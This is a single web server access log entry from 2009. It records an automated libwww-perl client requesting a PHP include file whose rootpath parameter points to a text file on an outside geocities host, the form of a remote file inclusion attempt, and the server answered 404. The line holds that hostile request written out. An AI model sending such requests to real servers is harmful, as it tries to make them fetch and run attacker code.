216.97.227.55 - - [30/Jan/2009:11:32:19 -0800] "GET /logs/layout/cmp_footer.inc.php?rootpath=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
